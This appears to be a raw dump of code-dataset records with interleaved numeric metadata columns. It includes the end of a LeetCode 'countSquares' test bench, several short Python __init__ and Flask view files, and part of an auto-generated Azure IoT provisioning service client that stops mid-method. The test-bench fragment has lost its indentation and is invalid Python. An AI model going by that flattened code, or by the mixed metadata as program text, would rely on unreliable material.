,1,0,0,0,1,0,0,1,1,1,0,0,1,0,1,0,1,1,1,1,0,1,0,0],[1,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,0],[0,0,0,0,1,0,1,1,1,0,1,1,1,1,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,1,1,0,1,0,1,1,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,1,0,1,0,1],[0,1,1,1,0,0,0,0,1,0,0,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,1,1,0,0,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,0,0,0,1,0,1,1,1,0,1,1,0,1],[0,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,0,1,1,0,0,0,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,1,0,1,0,1,0],[1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,1,1,0,1,1,0,0,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,0,1,1,1,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,1,1,1,0,1,0,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,1,0,1,0,0,0,0,1,0,0,1,0],[0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,1,0,1,0,1,1,0,1,1,0,0,0,1,1,1,0,1,0,1,0,1,1,1,0,0,0,0,1,1,1]]
),
]
# expected output:
'''
15
7
26466
'''
for t in test_data:
print( Solution().countSquares(matrix = t.matrix) )
return
if __name__ == '__main__':
test_bench()
| 849.86087
| 94,697
| 0.493973
| 47,418
| 97,734
| 1.017398
| 0.001814
| 0.493875
| 0.377029
| 0.254213
| 0.980557
| 0.978235
| 0.97666
| 0.97666
| 0.97666
| 0.976473
| 0
| 0.490589
| 0.016627
| 97,734
| 115
| 94,698
| 849.86087
| 0.011373
| 0.004236
| 0
| 0.214286
| 0
| 0
| 0.000236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.125
| 0.017857
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
ea8195bf300ad57d63f78ff2609600361b23a24e
| 49
|
py
|
Python
|
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
network/backbone/__init__.py
|
Ezreal-XD/Neat-Segmentation-Networks
|
1bf0cccc7f0663950572713f0cd05a228ce8abaa
|
[
"MIT"
] | null | null | null |
from . import resnet
from . import mobilenetv2
| 16.333333
| 26
| 0.755102
| 6
| 49
| 6.166667
| 0.666667
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.204082
| 49
| 2
| 27
| 24.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ea871d2f2c1f06c684ee07ef6f11ff030c3b78f7
| 205
|
py
|
Python
|
website/preprints/views.py
|
gaybro8777/osf.io
|
30408511510a40bc393565817b343ef5fd76ab14
|
[
"Apache-2.0"
] | 628
|
2015-01-15T04:33:22.000Z
|
2022-03-30T06:40:10.000Z
|
website/preprints/views.py
|
gaybro8777/osf.io
|
30408511510a40bc393565817b343ef5fd76ab14
|
[
"Apache-2.0"
] | 4,712
|
2015-01-02T01:41:53.000Z
|
2022-03-30T14:18:40.000Z
|
website/preprints/views.py
|
Johnetordoff/osf.io
|
de10bf249c46cede04c78f7e6f7e352c69e6e6b5
|
[
"Apache-2.0"
] | 371
|
2015-01-12T16:14:08.000Z
|
2022-03-31T18:58:29.000Z
|
# -*- coding: utf-8 -*-
from framework.flask import redirect # VOL-aware redirect
def preprint_landing_page(**kwargs):
return {}
def preprint_redirect(**kwargs):
return redirect('/preprints/')
| 20.5
| 58
| 0.697561
| 24
| 205
| 5.833333
| 0.708333
| 0.157143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.156098
| 205
| 9
| 59
| 22.777778
| 0.803468
| 0.195122
| 0
| 0
| 0
| 0
| 0.067901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0.6
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
|
0
| 7
|
5785a98cf9cc33d00abace8cedd058ec0b38e504
| 163
|
py
|
Python
|
labdrivers/quantumdesign/__init__.py
|
pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 12
|
2016-10-14T09:50:32.000Z
|
2022-03-28T00:36:31.000Z
|
labdrivers/quantumdesign/__init__.py
|
pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 21
|
2016-04-13T20:03:36.000Z
|
2019-09-25T13:00:52.000Z
|
labdrivers/quantumdesign/__init__.py
|
pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 3
|
2017-08-30T02:01:27.000Z
|
2020-03-04T01:50:52.000Z
|
from .qdinstrument import Dynacool
from .qdinstrument import Ppms
from .qdinstrument import Svsm
from .qdinstrument import VersaLab
from .qdinstrument import Mpms
| 27.166667
| 34
| 0.846626
| 20
| 163
| 6.9
| 0.4
| 0.57971
| 0.797101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122699
| 163
| 5
| 35
| 32.6
| 0.965035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
57fd54e6dd4ff1a9d696286f2c0b23ffd2f79ca3
| 36,245
|
py
|
Python
|
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
olivakar/azure-iot-sdk-python-preview
|
636855716a362bad1623983026666b5f91c22825
|
[
"MIT"
] | 6
|
2019-03-19T18:53:55.000Z
|
2020-02-23T18:29:57.000Z
|
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
noopkat/azure-iot-sdk-python-preview
|
f51733e9d3424c33ed86d51e214b20c843716763
|
[
"MIT"
] | null | null | null |
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
noopkat/azure-iot-sdk-python-preview
|
f51733e9d3424c33ed86d51e214b20c843716763
|
[
"MIT"
] | 1
|
2019-04-11T15:56:50.000Z
|
2019-04-11T15:56:50.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import SDKClient
from msrest import Configuration, Serializer, Deserializer
from .version import VERSION
from msrest.pipeline import ClientRawResponse
from . import models
class ProvisioningServiceClientConfiguration(Configuration):
"""Configuration for ProvisioningServiceClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
:param str base_url: Service URL
"""
def __init__(self, credentials, base_url=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if not base_url:
base_url = "https://localhost"
super(ProvisioningServiceClientConfiguration, self).__init__(base_url)
self.add_user_agent("provisioningserviceclient/{}".format(VERSION))
self.credentials = credentials
class ProvisioningServiceClient(SDKClient):
"""API for service operations with the Azure IoT Hub Device Provisioning Service
:ivar config: Configuration for client.
:vartype config: ProvisioningServiceClientConfiguration
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
:param str base_url: Service URL
"""
def __init__(self, credentials, base_url=None):
self.config = ProvisioningServiceClientConfiguration(credentials, base_url)
super(ProvisioningServiceClient, self).__init__(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = "2018-09-01-preview"
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
def get_individual_enrollment(self, id, custom_headers=None, raw=False, **operation_config):
"""Get a device enrollment record.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IndividualEnrollment or ClientRawResponse if raw=true
:rtype: ~protocol.models.IndividualEnrollment or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("IndividualEnrollment", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def create_or_update_individual_enrollment(
self, id, enrollment, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Create or update a device enrollment record.
:param id: The registration ID is alphanumeric, lowercase, and may
contain hyphens.
:type id: str
:param enrollment: The device enrollment record.
:type enrollment: ~protocol.models.IndividualEnrollment
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IndividualEnrollment or ClientRawResponse if raw=true
:rtype: ~protocol.models.IndividualEnrollment or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.create_or_update_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct body
body_content = self._serialize.body(enrollment, "IndividualEnrollment")
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("IndividualEnrollment", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def delete_individual_enrollment(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Delete a device enrollment record.
:param id: Registration ID.
:type id: str
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def get_enrollment_group(self, id, custom_headers=None, raw=False, **operation_config):
"""Get a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EnrollmentGroup or ClientRawResponse if raw=true
:rtype: ~protocol.models.EnrollmentGroup or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("EnrollmentGroup", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def create_or_update_enrollment_group(
self,
id,
enrollment_group,
if_match=None,
custom_headers=None,
raw=False,
**operation_config
):
"""Create or update a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param enrollment_group: The device enrollment group.
:type enrollment_group: ~protocol.models.EnrollmentGroup
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EnrollmentGroup or ClientRawResponse if raw=true
:rtype: ~protocol.models.EnrollmentGroup or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.create_or_update_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct body
body_content = self._serialize.body(enrollment_group, "EnrollmentGroup")
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("EnrollmentGroup", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def delete_enrollment_group(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Delete a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param if_match: The ETag of the enrollment group record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def get_device_registration_state(self, id, custom_headers=None, raw=False, **operation_config):
"""Gets the device registration state.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DeviceRegistrationState or ClientRawResponse if raw=true
:rtype: ~protocol.models.DeviceRegistrationState or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_device_registration_state.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("DeviceRegistrationState", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device_registration_state.metadata = {"url": "/registrations/{id}"}
def delete_device_registration_state(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Deletes the device registration.
:param id: Registration ID.
:type id: str
:param if_match: The ETag of the registration status record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_device_registration_state.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_device_registration_state.metadata = {"url": "/registrations/{id}"}
def run_bulk_enrollment_operation(
self, bulk_operation, custom_headers=None, raw=False, **operation_config
):
"""Bulk device enrollment operation.
:param bulk_operation: Bulk operation.
:type bulk_operation: ~protocol.models.BulkEnrollmentOperation
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BulkEnrollmentOperationResult or ClientRawResponse if
raw=true
:rtype: ~protocol.models.BulkEnrollmentOperationResult or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.run_bulk_enrollment_operation.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(bulk_operation, "BulkEnrollmentOperation")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("BulkEnrollmentOperationResult", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
run_bulk_enrollment_operation.metadata = {"url": "/enrollments"}
def query_individual_enrollments(
self,
query_specification,
x_ms_max_item_count=None,
x_ms_continuation=None,
custom_headers=None,
raw=False,
**operation_config
):
"""Query the device enrollment records.
:param query_specification: The query specification.
:type query_specification: ~protocol.models.QuerySpecification
:param x_ms_max_item_count: pageSize
:type x_ms_max_item_count: int
:param x_ms_continuation: continuation token
:type x_ms_continuation: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~protocol.models.IndividualEnrollment] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.query_individual_enrollments.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_max_item_count is not None:
header_parameters["x-ms-max-item-count"] = self._serialize.header(
"x_ms_max_item_count", x_ms_max_item_count, "int"
)
if x_ms_continuation is not None:
header_parameters["x-ms-continuation"] = self._serialize.header(
"x_ms_continuation", x_ms_continuation, "str"
)
# Construct body
body_content = self._serialize.body(query_specification, "QuerySpecification")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
header_dict = {}
if response.status_code == 200:
deserialized = self._deserialize("[IndividualEnrollment]", response)
header_dict = {
"x-ms-continuation": "str",
"x-ms-max-item-count": "int",
"x-ms-item-type": "str",
}
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
client_raw_response.add_headers(header_dict)
return client_raw_response
return deserialized
query_individual_enrollments.metadata = {"url": "/enrollments/query"}
def get_individual_enrollment_attestation_mechanism(
self, id, custom_headers=None, raw=False, **operation_config
):
"""Get the attestation mechanism in the device enrollment record.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AttestationMechanism or ClientRawResponse if raw=true
:rtype: ~protocol.models.AttestationMechanism or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_individual_enrollment_attestation_mechanism.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("AttestationMechanism", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_individual_enrollment_attestation_mechanism.metadata = {
"url": "/enrollments/{id}/attestationmechanism"
}
def query_enrollment_groups(
self,
query_specification,
x_ms_max_item_count=None,
x_ms_continuation=None,
